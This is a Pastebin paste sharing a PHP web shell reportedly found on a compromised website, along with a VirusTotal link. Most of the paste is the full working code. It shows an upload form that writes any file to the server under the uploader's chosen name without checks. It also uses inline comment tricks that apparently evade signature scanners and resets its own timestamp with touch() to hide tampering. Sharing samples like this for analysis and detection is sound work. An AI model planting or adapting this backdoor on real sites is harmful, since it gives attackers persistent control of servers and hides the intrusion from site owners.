Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- php file found on compromised website
- https://www.virustotal.com/en/file/5aa8e87fc877cf23a0323ac5d1acae793dba97a9918063aca4a88cd44c072674/analysis/
- ---------------------------------------------------------------
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
- <title>yo</title>
- </head>
- <body>
- <?php
- print '<h1>#p@$c@#</h1>\n';
- echo "Your IP: ";
- echo $_SERVER['REMOTE_ADDR'];
- echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
- echo "<input type=\"file\" name=\"filename\"><br> \n";
- echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
- echo "</form>\n";
- if ( isset($_FILES["filename"]) )
- {
- if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
- {
- move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
- $file = $_FILES/*;*/["filename"]["name"];
- echo "<a href=\"$file\">$file</a>";
- } else {
- echo("empty");
- }
- $filename = $_SERVER['SCRIPT_FILENAME'];
- touch/*;*/($filename, time());
- }
- ?>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement